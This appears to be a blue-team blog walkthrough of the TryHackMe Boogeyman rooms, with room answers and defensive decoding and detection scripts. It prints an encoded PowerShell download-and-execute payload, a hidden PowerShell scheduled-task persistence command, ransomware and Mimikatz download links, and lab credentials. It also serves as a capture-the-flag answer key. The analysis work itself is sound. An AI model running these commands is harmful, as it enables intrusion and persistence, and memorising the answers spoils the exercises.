Introduction
This post walks through three cyberattack scenarios in which a phishing email was the initial entry point. The accompanying video works through the three TryHackMe Boogeyman rooms, which make up the TryHackMe SOC Level 1 capstone, as real-world-style case studies for SOC analysts and threat hunters.
What is a Blue Team in Cyber Security?
In cybersecurity, the “Blue Team” refers to a group of security professionals responsible for defending an organization’s information systems. Their primary role is to protect, monitor, and respond to security incidents. Blue Teams focus on:
- Detecting vulnerabilities within systems and networks
- Implementing security measures like firewalls, intrusion detection systems, and encryption
- Monitoring for threats using security tools and logs
- Responding to incidents and mitigating attacks when they occur
- Performing regular security assessments to strengthen the organization’s defenses
They often work opposite the “Red Team,” which simulates attacks to test the Blue Team’s defenses.
What is a SOC Analyst in Cyber Security?
A SOC Analyst (Security Operations Center Analyst) is a cybersecurity professional who monitors and defends an organization’s IT infrastructure from cyber threats. Their main responsibilities include:
- Monitoring Security Alerts: Continuously reviewing logs, alerts, and other system notifications from security tools like firewalls, intrusion detection/prevention systems, and SIEM (Security Information and Event Management) platforms.
- Incident Detection and Response: Investigating potential security incidents and taking steps to contain, mitigate, and resolve them. This may involve isolating infected systems, analyzing malware, and coordinating with other teams to respond effectively.
- Threat Hunting: Proactively searching for potential threats that have not been detected by automated tools by analyzing trends and unusual activity.
- Reporting and Documentation: Creating reports on security incidents, vulnerabilities, and risks, and documenting their findings for future analysis or compliance.
- Collaboration: Working with the wider Blue Team and other internal teams to strengthen defenses and implement security policies and best practices.
SOC Analysts typically work in a Security Operations Center, where they monitor and safeguard the organization’s digital environment 24/7.
Breakdown of the Attack Scenarios
Scenario 1: Phishing Email with a Shortcut File:
In the first scenario, the phishing email carries a password-protected archive containing a Windows shortcut (.lnk) file. When the shortcut is opened it runs an encoded PowerShell one-liner that downloads and executes a stager from the attacker's file-hosting server. The email was sent to an employee of Quick Logistics LLC, and the analysis examines the message, its headers, and the attachment; the encoded command is recovered from the shortcut's Command Line Arguments field with the lnkparse tool.
Decoding that command shows PowerShell fetching further files from the attacker's infrastructure; the commands later issued from the C2 server download an enumeration tool and exfiltrate a KeePass database over DNS. The email was sent through a third-party mail relay service (Elastic Email), visible in the DKIM-Signature and List-Unsubscribe headers, which lends it legitimacy and helps it past spam filters. The file-hosting and C2 domains are identified, and the Base64 payloads are decoded with echo and base64. One caveat: PowerShell's encoded commands are Base64 over UTF-16LE text, so the raw output of base64 -d contains a null byte after every character; pipe it through iconv -f UTF-16LE -t UTF-8 (or strip the nulls) to get readable text.
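The decoding step described above, as an added example (not code from the original post or from TryHackMe): it takes the encoded blob that lnkparse reports for this room's shortcut, decodes it as Base64 over UTF-16LE, pulls out the URLs and hosts, and flags the download-and-execute primitives a SOC analyst would alert on. The same decoder applies to the Boogeyman 2 scheduled task later on this page, whose payload is unpacked with [Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String(...)), because "UNICODE" in .NET means UTF-16LE. The URL regex and the indicator list are the editor's choices, not something the room prescribes.

```python
import base64
import re

# Encoded payload as recovered by lnkparse from the shortcut's Command Line
# Arguments field (the Boogeyman 1 answer quoted later on this page).
LNK_ENCODED = (
    "aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4A"
    "YgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA=="
)


def decode_powershell_encoded(blob: str) -> str:
    """Decode a PowerShell -EncodedCommand style blob: Base64 over UTF-16LE text.

    Also works for payloads a script unpacks itself with
    [Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String(...)).
    """
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE, or the blob was truncated")
    return raw.decode("utf-16-le")


# Editor's regex: scheme, host, optional port, optional path up to a quote/space/paren.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"()]*)?")


def extract_urls(script: str) -> list[str]:
    """Return every http(s) URL embedded in the decoded script, in order."""
    return URL_RE.findall(script)


def extract_hosts(urls: list[str]) -> set[str]:
    """Reduce URLs to bare hostnames, e.g. for blocking or pivoting in the SIEM."""
    return {re.sub(r"^https?://", "", u).split("/")[0].split(":")[0] for u in urls}


# Download-and-execute primitives worth alerting on in any decoded one-liner
# (editor's list; extend to taste).
INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "net.webclient", "invoke-webrequest", "frombase64string",
)


def suspicious_indicators(script: str) -> list[str]:
    """Case-insensitive substring match of known download/execute primitives."""
    low = script.lower()
    return [ind for ind in INDICATORS if ind in low]


def triage(blob: str) -> dict:
    """One-shot triage of an encoded command: decoded text, URLs, hosts, indicators."""
    script = decode_powershell_encoded(blob)
    urls = extract_urls(script)
    return {
        "script": script,
        "urls": urls,
        "hosts": sorted(extract_hosts(urls)),
        "indicators": suspicious_indicators(script),
    }


if __name__ == "__main__":
    for key, value in triage(LNK_ENCODED).items():
        print(f"{key}: {value}")
```

The shell one-liner equivalent of decode_powershell_encoded is `echo '<blob>' | base64 -d | iconv -f UTF-16LE -t UTF-8`; without the iconv step the nulls between characters make the grep for the URL fail.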
Scenario 2: Word Document with a VBA Macro:
In the second scenario, the phishing email carries a Word document with an embedded VBA macro. When the document is opened, the macro fetches a stage 2 payload, a JScript file, from the attacker's server and runs it with wscript.exe. That script downloads an executable which establishes the C2 connection, and the attacker then creates a daily scheduled task to keep persistent access. The analysis combines email, disk and memory artefacts to recover the C2 details and the persistence mechanism.
Scenario 3: HTA File and Domain Compromise:
The third attack involves an HTA (HTML Application) file which, when opened, retrieves a malicious payload from the internet. Its execution leads to a UAC bypass, credential dumping with Mimikatz, lateral movement with the stolen credentials, and finally a DCSync against the organization's domain controller followed by a ransomware download. The analysis uses Elasticsearch and other tools to examine logs, analyze network activity, and trace the attacker's actions across the compromised hosts.
TryHackMe Boogeyman 1
Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.
The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.
You are tasked to analyse and assess the impact of the compromise.
Room Answers
What is the email address used to send the phishing email?
agriffin@bpakcaging.xyz
What is the email address of the victim?
julianne.westcott@hotmail.com
What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?
elasticemail
What is the name of the file inside the encrypted attachment?
Invoice_20230103.lnk
What is the password of the encrypted attachment?
Invoice2023!
Based on the result of the lnkparse tool, what is the encoded payload found in the Command Line Arguments field?
aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order. (e.g. a.domain.com,b.domain.com)
cdn.bpakcaging.xyz,files.bpakcaging.xyz
What is the name of the enumeration tool downloaded by the attacker?
seatbelt
What is the file accessed by the attacker using the downloaded sq3.exe binary? Provide the full file path with escaped backslashes.
C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
What is the software that uses the file in Q3?
Microsoft Sticky Notes
What is the name of the exfiltrated file?
protected_data.kdbx
What type of file uses the .kdbx file extension?
keepass
What is the encoding used during the exfiltration attempt of the sensitive file?
hex
What is the tool used for exfiltration?
nslookup
What software is used by the attacker to host its presumed file/payload server?
python
What HTTP method is used by the C2 for the output of the commands executed by the attacker?
POST
What is the protocol used during the exfiltration activity?
dns
What is the password of the exfiltrated file?
%p9^3!lL^Mz47E2GaT^y
What is the credit card number stored inside the exfiltrated file?
4024007128269551
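The exfiltration answers above (hex encoding, nslookup, DNS) describe a pattern worth being able to undo from a packet capture: each DNS query name carries a hex chunk of the file as a subdomain of the attacker's domain. The block below is an added example by the editor, not the room's code, that reassembles such a stream from a query log and identifies the result by its file signature. The log lines are constructed to look like `tshark -T fields -e frame.time_relative -e ip.src -e dns.qry.name` output; the hex labels are not the room's data but the KeePass 2.x magic bytes followed by filler, chunked by hand, with one chunk repeated to mimic a resolver retry.

```python
import re

# KeePass 2.x file signature: little-endian 0x9AA2D903 then 0xB54BFB67.
KDBX2_MAGIC = bytes.fromhex("03d9a29a67fb4bb5")
ATTACKER_DOMAIN = "bpakcaging.xyz"

# Constructed sample log: "<time> <source IP> <query name>". The hex labels are
# NOT the room's traffic; they encode KDBX2_MAGIC + b"KeePass sample body.".
# The second chunk appears twice to simulate a retransmitted lookup.
SAMPLE_DNS_LOG = """\
0.000 10.10.1.5 www.microsoft.com
0.412 10.10.1.5 03d9a29a67fb4bb54b65.bpakcaging.xyz
0.913 10.10.1.5 65506173732073616d70.bpakcaging.xyz
1.402 10.10.1.5 65506173732073616d70.bpakcaging.xyz
1.880 10.10.1.5 files.bpakcaging.xyz
2.301 10.10.1.5 6c6520626f64792e.bpakcaging.xyz
"""

HEX_LABEL = re.compile(r"^[0-9a-f]+$")


def extract_chunks(log_text: str, domain: str) -> list[str]:
    """Pull the hex-encoded subdomain chunks sent to `domain`, in capture order.

    Non-hex subdomains (files., cdn., ...) are ordinary infrastructure lookups
    and are skipped; a chunk identical to the previous one is treated as a
    retry and dropped.
    """
    suffix = "." + domain.lower()
    chunks: list[str] = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        qname = parts[-1].rstrip(".").lower()
        if not qname.endswith(suffix):
            continue
        label = qname[: -len(suffix)].replace(".", "")  # join multi-label chunks
        if not HEX_LABEL.match(label) or len(label) % 2:
            continue
        if chunks and chunks[-1] == label:
            continue
        chunks.append(label)
    return chunks


def reassemble(chunks: list[str]) -> bytes:
    """Concatenate the hex chunks and decode them back to the original bytes."""
    return bytes.fromhex("".join(chunks))


def identify(data: bytes) -> str:
    """Name the reconstructed file by its magic; only the type seen in this room is known."""
    if data.startswith(KDBX2_MAGIC):
        return "KeePass 2.x database (.kdbx)"
    return "unknown"


def summarize(log_text: str, domain: str) -> dict:
    """Triage view: how much left the network, and what it was."""
    chunks = extract_chunks(log_text, domain)
    data = reassemble(chunks)
    return {"queries": len(chunks), "bytes": len(data), "type": identify(data)}


if __name__ == "__main__":
    print(summarize(SAMPLE_DNS_LOG, ATTACKER_DOMAIN))
```

The consecutive-duplicate rule is a judgement call: it removes resolver retries but would also swallow a genuinely repeated chunk, so when the reconstructed file fails to open, re-run without it and compare sizes. A `.kdbx` recovered this way is still encrypted; the password in the answers above came from the Sticky Notes database the attacker read with sq3.exe, not from the capture.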
TryHackMe Boogeyman 2
Maxine, a Human Resource Specialist working for Quick Logistics LLC, received an application for one of the open positions in the company. Unbeknownst to her, the attached resume was malicious and compromised her workstation.
The security team was able to flag some suspicious commands executed on the workstation of Maxine, which prompted the investigation. Given this, you are tasked to analyse and assess the impact of the compromise.
Room Answers
What email was used to send the phishing email?
westaylor23@outlook.com
What is the email of the victim employee?
maxine.beck@quicklogisticsorg.onmicrosoft.com
What is the name of the attached malicious document?
Resume_WesleyTaylor.doc
What is the MD5 hash of the malicious attachment?
52c4384a0b9e248b95804352ebec6c5b
What URL is used to download the stage 2 payload based on the document’s macro?
https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png
What is the name of the process that executed the newly downloaded stage 2 payload?
wscript.exe
What is the full file path of the malicious stage 2 payload?
C:\ProgramData\update.js
What is the PID of the process that executed the stage 2 payload?
4260
What is the parent PID of the process that executed the stage 2 payload?
1124
What URL is used to download the malicious binary executed by the stage 2 payload?
https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe
What is the PID of the malicious process used to establish the C2 connection?
6216
What is the full file path of the malicious process used to establish the C2 connection?
C:\Windows\Tasks\updater.exe
What is the IP address and port of the C2 connection initiated by the malicious binary? (Format: IP address:port)
128.199.95.189:8080
What is the full file path of the malicious email attachment based on the memory dump?
C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc
The attacker implanted a scheduled task right after establishing the c2 callback. What is the full command used by the attacker to maintain persistent access?
schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"'
TryHackMe Boogeyman 3
Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.
The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.
Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.
Room Answers
What is the PID of the process that executed the initial stage 1 payload?
6392
The stage 1 payload attempted to implant a file to another location. What is the full command-line value of this execution?
"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat
The implanted file was eventually used and executed by the stage 1 payload. What is the full command-line value of this execution?
"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
The stage 1 payload established a persistence mechanism. What is the name of the scheduled task created by the malicious script?
Review
The execution of the implanted file inside the machine has initiated a potential C2 connection. What is the IP and port used by this connection? (format: IP:port)
165.232.170.151:80
The attacker has discovered that the current access is a local administrator. What is the name of the process used by the attacker to execute a UAC bypass?
fodhelper.exe
Having a high privilege machine access, the attacker attempted to dump the credentials inside the machine. What is the GitHub link used by the attacker to download a tool for credential dumping?
https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip
After successfully dumping the credentials inside the machine, the attacker used the credentials to gain access to another machine. What is the username and hash of the new credential pair? (format: username:hash)
itadmin:F84769D250EB95EB2D7D8B4A1C5613F2
Using the new credentials, the attacker attempted to enumerate accessible file shares. What is the name of the file accessed by the attacker from a remote share?
IT_Automation.ps1
After getting the contents of the remote file, the attacker used the new credentials to move laterally. What is the new set of credentials discovered by the attacker? (format: username:password)
QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987
What is the hostname of the attacker’s target machine for its lateral movement attempt?
WKSTN-1327
Using the malicious command executed by the attacker from the first machine to move laterally, what is the parent process name of the malicious command executed on the second compromised machine?
wsmprovhost.exe
The attacker then dumped the hashes in this second machine. What is the username and hash of the newly dumped credentials? (format: username:hash)
administrator:00f80f2538dcb54e7adc715c0e7091ec
After gaining access to the domain controller, the attacker attempted to dump the hashes via a DCSync attack. Aside from the administrator account, what account did the attacker dump?
backupda
After dumping the hashes, the attacker attempted to download another remote file to execute ransomware. What is the link used by the attacker to download the ransomware binary?
http://ff.sillytechninja.io/ransomboogey.exe
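The command lines recorded in the Boogeyman 2 and 3 answers (xcopy into a user's Temp folder, rundll32 loading a .dat via DllRegisterServer, a child of fodhelper.exe, schtasks registering a hidden PowerShell task) are the kind of thing a detection engineer turns into process-creation rules. The block below is an added example by the editor, not the rooms' or TryHackMe's code: four simple rules run over a constructed list of Sysmon-style process-creation events. The PIDs for the stage 1 payload and the schtasks command are taken from the answers above; the parent images, the other PIDs and the shell/script-host list are the editor's assumptions, and the real rooms' log format (Elasticsearch documents) is not reproduced here.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal process-creation record (Sysmon event ID 1 fields, renamed)."""
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# rundll32 argument shape: <path>.<ext>,<Export>
RUNDLL_ARG = re.compile(r'([^\s"]+\.([A-Za-z0-9]+)),([A-Za-z_]\w*)')

# Editor's list of children that fodhelper.exe has no business launching.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
          "wscript.exe", "cscript.exe", "mshta.exe", "regsvr32.exe"}


def rundll32_non_dll(ev: Event):
    """rundll32 given a file that is not a .dll (review.dat in Boogeyman 3)."""
    if _name(ev.image) != "rundll32.exe":
        return None
    m = RUNDLL_ARG.search(ev.command_line)
    if m and m.group(2).lower() != "dll":
        return f"rundll32 loading non-DLL {m.group(1)} via export {m.group(3)}"
    return None


def fodhelper_child(ev: Event):
    """A shell spawned by the auto-elevated fodhelper.exe: classic UAC bypass."""
    if _name(ev.parent_image) == "fodhelper.exe" and _name(ev.image) in SHELLS:
        return f"{_name(ev.image)} spawned by fodhelper.exe (UAC bypass)"
    return None


def schtasks_hidden_powershell(ev: Event):
    """schtasks /Create whose action is hidden or Base64-unpacking PowerShell."""
    cl = ev.command_line.lower()
    if _name(ev.image) == "schtasks.exe" and "/create" in cl and "powershell" in cl \
            and any(k in cl for k in ("-w hidden", "-enc", "frombase64string")):
        return "scheduled task running hidden/encoded PowerShell"
    return None


def xcopy_to_temp(ev: Event):
    """xcopy staging a file into a user's AppData\\Local\\Temp."""
    if _name(ev.image) == "xcopy.exe" and re.search(r"\\appdata\\local\\temp\\", ev.command_line, re.I):
        return "xcopy staging a file into a user Temp directory"
    return None


RULES = [
    ("rundll32_non_dll", rundll32_non_dll),
    ("fodhelper_child", fodhelper_child),
    ("schtasks_hidden_powershell", schtasks_hidden_powershell),
    ("xcopy_to_temp", xcopy_to_temp),
]


def run_detections(events: list[Event]) -> list[tuple[int, str, str]]:
    """Return (pid, rule name, detail) for every event that trips a rule."""
    findings = []
    for ev in events:
        for rule_name, rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append((ev.pid, rule_name, detail))
    return findings


# Constructed sample events. Command lines for 7104, 7210 and 7520 are the ones
# quoted in the answers above; everything else (parent images, file names,
# other PIDs) is made up for the example.
SAMPLE_EVENTS = [
    Event(4012, 3988, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    Event(6392, 4012, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
          r'"C:\Windows\System32\mshta.exe" C:\Users\evan.hutchinson\Downloads\stage1.hta'),
    Event(7104, 6392, r"C:\Windows\System32\xcopy.exe", r"C:\Windows\System32\mshta.exe",
          r'"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat'),
    Event(7210, 6392, r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\mshta.exe",
          r'"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer'),
    Event(7388, 7300, r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'"C:\Windows\System32\fodhelper.exe"'),
    Event(7402, 7388, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\fodhelper.exe", "cmd.exe /c whoami"),
    Event(7520, 7402, r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
          r"""schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"'"""),
]


if __name__ == "__main__":
    for pid, rule_name, detail in run_detections(SAMPLE_EVENTS):
        print(f"PID {pid}: [{rule_name}] {detail}")
```

Each rule keys on a behaviour rather than a hash or a domain, so it would still fire if the Boogeyman changed the file names; the cost is that xcopy_to_temp in particular needs tuning against your own baseline before it goes into a SIEM as an alert rather than a hunt query.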